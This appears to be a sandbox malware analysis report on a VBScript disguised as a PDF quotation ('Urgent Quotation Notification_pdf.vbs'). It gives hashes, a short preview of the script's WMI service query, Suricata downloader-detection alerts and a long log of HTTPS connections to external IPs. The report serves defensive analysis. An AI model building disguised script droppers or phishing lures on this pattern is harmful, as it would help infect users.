                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  Static File Info

                                  General

                                  File type:ASCII text, with very long lines (2129), with CRLF line terminators
                                  Entropy (8bit):5.9430873985827155
                                  TrID:
                                  • Visual Basic Script (13500/0) 100.00%
                                  File name:Urgent Quotation Notification_pdf.vbs
                                  File size:22'363 bytes
                                  MD5:9399cd1db4c7360b891ecc977dfbdc2a
                                  SHA1:968f602adcb6c30b6a6f3520bf90f17d9511e7c7
                                  SHA256:ee0a0898ddb59aa40d7c429d982e56a1ca4847a2872b857a1a3934d316075576
                                  SHA512:dc65b802977945138bc50a01f65d5b5ef51db05a36cc8058f93ff03ce571d9cfeef13ab7d2ae932bda0d1c1abcc19c76c63603f92dcd22c65f0158600ecddf61
                                  SSDEEP:384:5Ct1s/AY/KNCARVZLDLEYlXEEanhC4ZscgniCwyvN2vYiWdgPTwRUQBXANeu:8tiYY/KNCsZjELEOC4ZNPoggibPTwRUL
                                  TLSH:77A27E996D6010DA145359F385CE39B8C11C26F72A71A8B95C5CF8329E0A3747EACCAF
                                  File Content Preview:..If Kanvasser("C:\") <> vbnullstring then ....Set Tusklike = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\r" + "oot\cimv2")....end if ......Set Centrifugerne = Tusklike.ExecQuery("Select * from Win32_Service")....on error resume next......For

                                  File Icon

                                  Icon Hash:68d69b8f86ab9a86

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-09-30T09:58:13.830927+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949710142.250.186.33443TCP
                                  2024-09-30T09:58:29.041282+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949716142.250.186.174443TCP
                                  2024-09-30T09:58:54.549717+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.957672142.250.186.174443TCP
                                  2024-09-30T09:59:04.582563+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.957674142.250.186.174443TCP
                                  2024-09-30T09:59:30.054853+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.957680142.250.186.174443TCP
                                  2024-09-30T09:59:41.117471+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.957682142.250.186.174443TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Sep 30, 2024 09:58:05.137798071 CEST49707443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:05.137835026 CEST44349707142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:05.137902975 CEST49707443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:05.145252943 CEST49707443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:05.145267010 CEST44349707142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:05.787439108 CEST44349707142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:05.787631035 CEST49707443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:05.788547993 CEST44349707142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:05.790802002 CEST49707443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:05.793306112 CEST49707443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:05.793322086 CEST44349707142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:05.793708086 CEST44349707142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:05.834145069 CEST49707443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:05.846029043 CEST49707443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:05.887393951 CEST44349707142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:06.172177076 CEST44349707142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:06.174057961 CEST44349707142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:06.174509048 CEST49707443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:06.301578999 CEST49707443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:06.358074903 CEST49708443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:06.358108044 CEST44349708142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:06.358197927 CEST49708443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:06.362818956 CEST49708443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:06.362831116 CEST44349708142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:07.016201973 CEST44349708142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:07.016288042 CEST49708443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:07.019500017 CEST49708443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:07.019509077 CEST44349708142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:07.019778013 CEST44349708142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:07.020767927 CEST49708443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:07.063400030 CEST44349708142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:07.451811075 CEST44349708142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:07.451879978 CEST49708443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:07.451899052 CEST44349708142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:07.451941013 CEST49708443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:07.451946974 CEST44349708142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:07.451980114 CEST44349708142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:07.452019930 CEST49708443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:07.457581043 CEST49708443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:11.661947012 CEST49709443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:11.662002087 CEST44349709142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:11.662077904 CEST49709443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:11.662389994 CEST49709443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:11.662405968 CEST44349709142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:12.312937021 CEST44349709142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:12.334670067 CEST49709443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:12.334708929 CEST44349709142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:12.714684963 CEST44349709142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:12.716516018 CEST44349709142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:12.716594934 CEST49709443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:12.717048883 CEST49709443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:12.718660116 CEST49710443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:12.718708038 CEST44349710142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:12.718849897 CEST49710443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:12.719118118 CEST49710443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:12.719131947 CEST44349710142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:13.376616955 CEST44349710142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:13.377964020 CEST49710443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:13.377990007 CEST44349710142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:13.830899000 CEST44349710142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:13.830939054 CEST44349710142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:13.830972910 CEST49710443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:13.831002951 CEST44349710142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:13.831037045 CEST49710443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:13.831044912 CEST44349710142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:13.831079006 CEST44349710142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:13.831239939 CEST49710443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:13.846919060 CEST49710443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:17.958138943 CEST49713443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:17.958194971 CEST44349713142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:17.958261013 CEST49713443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:17.958534002 CEST49713443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:17.958549023 CEST44349713142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:18.587811947 CEST44349713142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:18.589126110 CEST49713443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:18.589167118 CEST44349713142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:18.979789019 CEST44349713142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:18.980703115 CEST44349713142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:18.981326103 CEST49713443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:18.981595993 CEST49713443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:22.977194071 CEST49715443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:22.977237940 CEST44349715142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:22.977344036 CEST49715443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:22.977629900 CEST49715443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:22.977643013 CEST44349715142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:23.608550072 CEST44349715142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:23.610158920 CEST49715443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:23.610182047 CEST44349715142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:23.989706039 CEST44349715142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:23.991373062 CEST44349715142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:23.991462946 CEST49715443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:23.991775036 CEST49715443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:28.008397102 CEST49716443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:28.008450031 CEST44349716142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:28.008554935 CEST49716443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:28.009394884 CEST49716443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:28.009417057 CEST44349716142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:28.649436951 CEST44349716142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:28.651143074 CEST49716443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:28.651161909 CEST44349716142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:29.041280031 CEST44349716142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:29.042185068 CEST44349716142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:29.042249918 CEST49716443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:29.042565107 CEST49716443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:29.043438911 CEST49717443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:29.043509007 CEST44349717142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:29.043580055 CEST49717443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:29.043889046 CEST49717443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:29.043905973 CEST44349717142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:29.048729897 CEST49717443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:29.091412067 CEST44349717142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:29.701219082 CEST44349717142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:29.701314926 CEST49717443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:33.103039026 CEST49718443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:33.103110075 CEST44349718142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:33.103226900 CEST49718443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:33.103486061 CEST49718443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:33.103497982 CEST44349718142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:33.741614103 CEST44349718142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:33.742860079 CEST49718443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:33.742908955 CEST44349718142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:34.135071039 CEST44349718142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:34.135148048 CEST44349718142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:34.135229111 CEST49718443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:34.145366907 CEST49718443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:34.146179914 CEST49719443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:34.146229982 CEST44349719142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:34.146301031 CEST49719443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:34.146528006 CEST49719443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:34.146541119 CEST44349719142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:34.147197008 CEST49719443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:34.187452078 CEST44349719142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:34.782841921 CEST44349719142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:34.782967091 CEST49719443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:34.782974958 CEST44349719142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:58:34.783010960 CEST49719443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:34.783031940 CEST49719443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:58:38.352343082 CEST49720443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:38.352408886 CEST44349720142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:38.352508068 CEST49720443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:38.352771997 CEST49720443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:38.352793932 CEST44349720142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:39.005461931 CEST44349720142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:39.007072926 CEST49720443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:39.007155895 CEST44349720142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:39.414727926 CEST44349720142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:39.416913986 CEST44349720142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:39.417018890 CEST49720443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:39.417352915 CEST49720443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:43.415087938 CEST57668443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:43.415154934 CEST44357668142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:43.415293932 CEST57668443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:43.415551901 CEST57668443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:43.415566921 CEST44357668142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:44.096879005 CEST44357668142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:44.097887039 CEST57668443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:44.097918987 CEST44357668142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:44.480092049 CEST44357668142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:44.480987072 CEST44357668142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:44.481050014 CEST57668443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:44.481350899 CEST57668443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:48.492892981 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:48.492939949 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:48.493052006 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:48.493248940 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:48.493264914 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:49.122517109 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:49.123923063 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:49.123951912 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:49.503328085 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:49.503609896 CEST44357671142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:49.503686905 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:49.504002094 CEST57671443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:53.515289068 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:53.515331984 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:53.515409946 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:53.515728951 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:53.515739918 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:54.147476912 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:54.148694992 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:54.148705959 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:54.549726009 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:54.550667048 CEST44357672142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:54.550720930 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:54.551075935 CEST57672443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:58.571369886 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:58.571415901 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:58.571508884 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:58.571749926 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:58.571763992 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:59.229530096 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:59.230695009 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:59.230710030 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:59.624577045 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:59.625236988 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:58:59.625300884 CEST44357673142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:58:59.625350952 CEST57673443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:03.633477926 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:03.633528948 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:03.633706093 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:03.633913040 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:03.633924007 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.271814108 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.271962881 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:04.272592068 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.272656918 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:04.274465084 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:04.274478912 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.274991035 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.275902033 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:04.319403887 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.582541943 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.583158016 CEST44357674142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:04.583209038 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:04.583597898 CEST57674443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:08.586734056 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:08.586779118 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:08.586920023 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:08.587141037 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:08.587152958 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:09.216516972 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:09.217956066 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:09.217978001 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:09.605846882 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:09.608652115 CEST44357675142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:09.608786106 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:09.609061003 CEST57675443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:09.609880924 CEST57676443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:09.609925032 CEST44357676142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:09.609972000 CEST57676443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:13.602379084 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:13.602440119 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:13.602526903 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:13.602756023 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:13.602771044 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:14.318661928 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:14.320445061 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:14.320548058 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:14.711661100 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:14.712701082 CEST44357677142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:14.712793112 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:14.720526934 CEST57677443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:18.754765034 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:18.754815102 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:18.754901886 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:18.758980036 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:18.759012938 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:19.559628010 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:19.561242104 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:19.561342001 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:19.947453976 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:19.948359966 CEST44357678142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:19.948467016 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:19.948957920 CEST57678443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:23.961688042 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:23.961746931 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:23.961858988 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:23.962061882 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:23.962071896 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:24.600171089 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:24.602531910 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:24.602554083 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:24.995028973 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:24.995884895 CEST44357679142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:24.995989084 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:24.996392965 CEST57679443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:29.008672953 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:29.008718967 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:29.008810043 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:29.009048939 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:29.009059906 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:29.655081034 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:29.657428980 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:29.657442093 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:30.054862976 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:30.054939985 CEST44357680142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:30.055016041 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:30.055422068 CEST57680443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:34.056608915 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:34.056653976 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:34.056725979 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:34.057023048 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:34.057034969 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:35.695902109 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:35.697290897 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:35.697319031 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:36.081360102 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:36.082071066 CEST44357681142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:36.082200050 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:36.082516909 CEST57681443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:40.087515116 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:40.087563992 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:40.090758085 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:40.090758085 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:40.090795040 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:40.722073078 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:40.723763943 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:40.723795891 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:41.117463112 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:41.118987083 CEST44357682142.250.186.174192.168.2.9
                                  Sep 30, 2024 09:59:41.119039059 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:41.119489908 CEST57682443192.168.2.9142.250.186.174
                                  Sep 30, 2024 09:59:41.120271921 CEST57683443192.168.2.9142.250.186.33
                                  Sep 30, 2024 09:59:41.120322943 CEST44357683142.250.186.33192.168.2.9
                                  Sep 30, 2024 09:59:41.120373964 CEST57683443192.168.2.9142.250.186.33
